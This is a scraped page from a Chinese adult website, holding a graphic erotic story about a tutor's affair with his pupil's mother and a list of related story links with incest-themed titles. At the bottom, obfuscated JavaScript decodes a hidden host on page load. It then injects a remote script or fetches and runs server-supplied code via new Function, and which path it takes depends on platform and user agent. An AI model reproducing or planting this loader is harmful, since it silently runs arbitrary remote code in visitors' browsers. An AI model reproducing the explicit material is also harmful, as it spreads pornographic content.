返回

母亲茉香902

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



任家庭教师的完治,很準时的在中学三年级的幸一的家按下电铃,星期五下午一时,幸一还没有回到家,「每一次都这么準时,好像一秒钟都不差,真是认真!」,开门的是幸一的母亲茉香。
「因为我实在等不急了!」完治紧紧的抱住学生的母亲茉香,把嘴唇压在茉香的红唇上,两人的舌头互缠。彼此吸吮对方的唾液,她们的接吻就像是性器的交媾。
「你真的等不及了吗?那么想和我做爱!」
「当然!」
「那么让我看你想我到什么程度吧?」茉香坐在床边,脸上露出挑逗的微笑。
听完茉香的话后,完治立刻脱掉上衣,想拥抱茉香时,茉香说︰「把下面也脱掉吧,让我看看你是不是真的想念我。」
完治脱下裤子,露出引以为傲的大肉棒,向前迈了一大步,「啊!真的,已经硬到可怜的程度!」茉香这样地说着。
茉香把嘴唇贴在龟头上,用手指轻弹龟头,俏皮的说︰「见不到我的日子只有靠手淫吧!」。
「没那回事。」完治脸红的急忙否认,茉香看到完治脸红的样子觉得很可爱,不禁爱怜的在龟头上亲吻。
茉香惊叫说︰「口红沾到阳具了!」,然后好像要清除口红似的,把阴茎吞入嘴里,然后开始用舌头舔,搔痒感使的完治好几次忍不住想后退,可是学生母亲的嘴唇紧紧夹住龟头根部,不肯放鬆。
完治猴急的想推开茉香的身体,把鸡巴插入学生母亲的阴互里,茉香娇嗔的说︰「你真笨,为你穿的漂亮洋装都弄坏了!」
听茉香如此说,完治才发觉茉香穿着紧身的黑色洋装,漂亮的肉体曲线整个显露出来,成熟的肉体美,让人感到要耀眼。
看到完治的表情,茉香露出性感的微笑,慢慢的拉下背后的拉炼,从黑色的洋装下,露出美艳的雪白肌肤,双肩都暴露后,茉香扭动着身体,双手爱抚着身体,慢慢地将洋装往下脱,洋装下的是一件黑衬裙,包围丰满乳房的部位有蕾丝,透明的能看出乳头,而更增加性感,即使只是轻微的动作,茉香的乳房还是爱怜的摇动着,学生的母亲用热情的眼神缓缓送来秋波。
完治忍不住吞下口水,茉香用让人急躁的速度慢慢地从腰部拉下洋装,出现衬裙的裙摆。
看到紧贴在大腿根的三角裤,三角裤也是黑色的,下面是有吊带的丝袜,当从脚下脱去洋装弯下上半身时,丰满的乳房随之摇动,从那里散发出成熟女人的芳香,学生的母亲身上只剩下衬裙、三角裤以及丝袜,这样的来到完治面前。
用手撩起披在肩上的黑髮,双腿做出互相摩擦的动作,然后静止不动。从腋下露出的黑毛另有一番性感,完治猴急的把脸靠在茉香的身上摩擦。
「乖宝贝!现在去床上躺下来」,完治乖乖地仰卧在床上,茉香立刻骑在完治的头上,用双腿夹住完治的脸,自己的红唇对正了完治的阳具。
此时压在完治鼻子上的一层薄薄的布料不断的溢出淫水甜美的芳香,从完治的鼻子传到脑海的喜欢的味道!
「可爱的小宝贝,现在我要为你脱三角裤了。」茉香微微的抬起屁股,把三角裤拉到大腿弯,火热的阴户压在完治的脸上,还可看到一片凌乱的阴毛。
完治张开嘴伸出舌头舔阴户的同时,茉香的淫水顺着完治的舌头流下,茉香说︰「真是好色的孩子,真的这么喜欢我的阴户吗?」茉香说完便站起来脱下三角裤,把完治的鸡巴吞入嘴里。
「啊……啊……」突然而来的强烈快感,使完治几乎要达到高潮。茉香发觉这种情形立刻从嘴里吐出阴茎用右手夹紧阴茎根部还不能射出来,「我要慢慢的疼这东西,你不能急!」
好像要冷却温度似的,可爱的在龟头那里吹一口气,茉香用嘴唇玩弄着完治的鸡巴,同时用二个丰乳不断的摩擦完治的胸部,那已流满淫水的阴户也不断的摩擦着完治的鼻子和嘴唇,不久后茉香的阴户紧贴而用力的,从完治的嘴唇、喉咙、胸部、而到达下半身的阳具一路下去。
完治的全身全沾满了茉香的淫液,而发出了湿润的光泽。茉香拉起汗湿的衬裙,细腰上只剩下黑色的吊袜带,露出雪白的后背,当衬裙通过头部时,完治趁机从背后紧抓她丰满的双乳。
「啊!小傻瓜,不要这样急嘛!」茉香说着,仍任由完治抚摸双乳,然后从头下取出衬裙丢在床边,完治的鸡巴好像在说想进入茉香的小穴里!茉香改变身体的方向,和完治面对面。
然后用含笑的眼睛看着完治,慢慢地抬起屁股,把手里的鸡巴对正自己的阴户,做一次深呼吸之后,然后慢慢的放下自己的屁股,「啊……」
当完治的鸡巴进入阴户理时,茉香的上身仰起成弓形,「啊……」茉香的阴户感觉一阵火热。
「怎么样,有性感吗?」茉香用自己的阴户自由自在的夹紧肉棒,缓缓套动。
「有性感,啊……夹的很紧……受不了!」自己的肉棒好像在里面抽畜,而又被夹紧的感觉,对年轻的肉棒而言,是过度的刺激。茉香以完治的肉棒做中心,屁股不停的向前后左右扭动,完治只觉得自己的肉棒弯曲的快要折断,不久完治喷出了精液。
受到男人强烈喷火般的冲击,从茉香的嘴里,发出气笛般的尖叫声!然后就倒在完治的身上,茉香的身体不只一次的抽动,同时把浸缅在于余韵中的肉棒夹紧,散落在完治脸上的茉香的长髮,散发出甜美的芳香。
不久后,终于筋疲力尽失去硬度的阴茎,从茉香的阴户里滑落出来!
休息片刻,茉香转过身来,一把抓住完治的肉棒,意犹未尽地细细抚摸,张开了樱桃小口,缓缓地送入口中,慢慢地加快了速度,不时以舌尖吸允着完治的龟头。
完治看着茉香激烈地动作,右手轻轻挽起茉香的长髮,仔细地欣赏茉香饥渴的表情。突然茉香停下了动作,吐出了肉棒,右手轻轻地套弄着,以极淫蕩的表情看着完治,问说︰「喜欢吗?」
完治点点头,茉香扶起完治让他坐在床边,让完治分开双腿。茉香蹲在完治的腿中间,以右手拨弄着肉棒,左手轻轻握住阴囊,缓缓搓弄起来。
茉香的朱唇轻启,以舌尖舔逗着已经开始甦醒的龟头,茉香的右手缓缓移到龟头的地方,以两指轻捏着龟头的两侧,左手扣弄着阴囊。
完治渐渐有了反应,跨下的阳具也开始涨大、变硬,龟头也分泌出兴奋的光彩。
茉香站直了身躯,转过身背对着完治,左右扭动圆翘的双臀,不时转头回来看着已经慾火焚身的完治。完治看着茉香淫蕩地舞着,一个赤裸裸、穿着黑色丝袜、足蹬高跟鞋的长髮美女在自己的身前跳着艳舞,完治的肉棒猛然怒张着。
茉香转过身来双手开始抚弄着自己高耸的乳房,在自己的娇躯四处游走,双眸微闭、舌头微舔着双唇,长髮飞散、香汗淋漓,左手开始往下游移到神秘的草丛,手指在淫水氾滥的桃源洞中穿梭进出,另一只手继续搓揉着双乳,不时捏着已经涨大的乳头。
完治实在忍不住了,冲过来抱住茉香,拚命的亲吻、拚命的搓弄茉香艳丽的娇躯。茉香吃吃地笑说︰「这么想要呀?」
完治以行动来代替回答,将嘴贴上了茉香的樱唇,舌头也伸入茉香的口中来一次死亡的法国之吻。在一连串激情的深吻后,茉香一只手套弄着完治坚挺的肉棒、一只手轻抚着完治的脸,柔声问着︰「这一次我们从后面来好不好?」
完治点点头鬆开手,茉香扭动着身躯来到床前,像一条母狗的姿势爬上了床,将圆翘的美臀向后挺出,右手伸到双腿跨开的股间将已如花蕊绽放的阴唇拨开,回头看着完治说︰「来呀!傻小子,让我看看你有多硬,用你的大鸡巴来餵饱我的小穴吧!」
完治挺着昂然抖动着的肉棒,走到茉香后面,双手一阵子柔捏着茉香的圆臀后,右手握住肉棒,让粗大的龟头在浪水四溢的淫穴上磨动,偶尔让肉棒浅浅插入,随即又拔出来。茉香开始受不了完治的逗弄,纤腰如水蛇般地扭动,完治看着女人淫蕩的骚样仍不为所动,茉香终于受不了,娇声喊着︰「快点插进来呀!」
完治故意装糊涂,说︰「什么东西快一点呀?讲清楚一点。」茉香方才自己抚慰自己的时候,也点燃了自身强烈的性慾,此时完治却偏偏在装蒜,茉香实在是忍不住了,只好开口求完治︰「好哥哥!快把大肉棒插进我的浪穴呀!」
茉香开口哀求了,完治心里在想︰「既然如此,那我就提枪上马了!」
完治狠狠地把腰一挺,粗长的肉棒就顺着淫水滑入茉香的淫穴里。茉香发出了满足的歎息声,「嗯!啊~~」。
完治开始缓缓地抽送,噗滋噗滋的淫水声充斥在房间内,茉香也开始发出了淫蕩的叫声︰「快一点!大力一点,啊!戳破我的小穴呀!再插入深一点!大肉棒哥哥好厉害呀,小淫妇快爽死了~~~」
完治听到茉香的淫声浪语,更加鼓足了气力冲刺猛干,茉香的头左摇右晃,长髮飞散在空中,茉香趴在床垫上,从下半身传来的趐麻的感觉,让她双手无力再支撑着,上半身已经半趴在床垫上,口中仍喃喃地说着︰「啊!好舒服,我快晕过去了!」
完治将右手扶着茉香的腰部,左手轮番玩弄着茉香如吊钟般的双乳,拚命地顶着茉香的屁股、拚命地抽送。粗长的肉棒沾满了茉香的爱夜,在灯光下隐隐地泛着一层光彩。
茉香的白玉般的娇躯淡淡地浮现一层粉红的斑点,汗水流遍了身体,交媾的淫水不断地流出,在床单上淋湿了一大片。
完治双手在茉香的玉体上四处游走,一会儿玩弄着茉香的乳房,一会儿摸着茉香依然套着吊带丝袜的双腿,猛力地抽动,恨不得把茉香干到晕死在床上。
茉香已经快精疲力竭,口中只有含糊不轻低声地呻吟着。
完治之前已经射出过一次了,所以这次可以特别持久。
完治抽送了一阵子,决定换着姿势,因为茉香已经撑不住了。
完治将肉棒从淫穴里拔出来,茉香彷彿被惊醒般发现下体的充实感消失了,急忙拉着完治说︰「不要离开!再把肉棒放进来,我等了好几天了!」
完治温柔的扶起茉香紧紧抱住,两个饥渴的肉体彷彿黏住无法分开一般。完治问茉香是否还要继续,茉香默默地点点头。
完治抱起茉香坐在床边,用坐莲观音的姿势,再次把肉棒插入茉香的浪穴,茉香双手环抱着完治的头,完治用强健的双臂抱着茉香的纤腰,配合着床店的弹性上上下下递交媾着。
粗状的肉棒飞快的进出浪水四溢的桃花源,茉香的浪叫声、肉棒和美肉的碰撞声此起彼落。
「啊!~~啊~~啊~~啊~~啊~~,我….我…我要丢了!」茉香失神地叫出来了。
完治起身来,抱着茉香走到橱柜旁的墙,让茉香单腿立着,淫水顺着茉香的腿一直流到地上,完治右手抬起茉香的左腿,加速地冲刺,此时茉香达到了高潮,「啊~~~~~~~~~~!」一股阴精如下雨般地落下,浇淋在完治膨胀的龟头上。
受到这般刺激,肉棒猛然抖动,一股强烈的精液喷射而出,沖激着茉香的子宫深处,原本已经接近昏厥的茉香受到冲击又醒了过来,摸着完治的脸说︰「大肉棒哥哥,你好猛哟!」两个人又再度的拥抱在一起,双双滚倒在地上睡去。


评分
相关推荐
3.0分

3.0分 母亲茉香-乱伦小说b58

3.0分

3.0分 茉香bb8

3.0分

3.0分 茉香-淫妻奸情18b

3.0分

3.0分 茉香-乱伦小说841

3.0分

3.0分 第902章、一晚做五次1f9

3.0分

3.0分 第902章 跟小和尚做的交易505

3.0分

3.0分 母亲6bd

3.0分

3.0分 母亲6bd

3.0分

3.0分 孕母肉香feb

3.0分

3.0分 操了亲姨母女和岳母母女共夫两穴亲954

3.0分

3.0分 母亲与我1d0

3.0分

3.0分 玩弄母亲da1

3.0分

3.0分 勾引母亲783

3.0分

3.0分 贵妇母亲72d

3.0分

3.0分 好色母亲e85

3.0分

3.0分 【母亲与我】92b


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};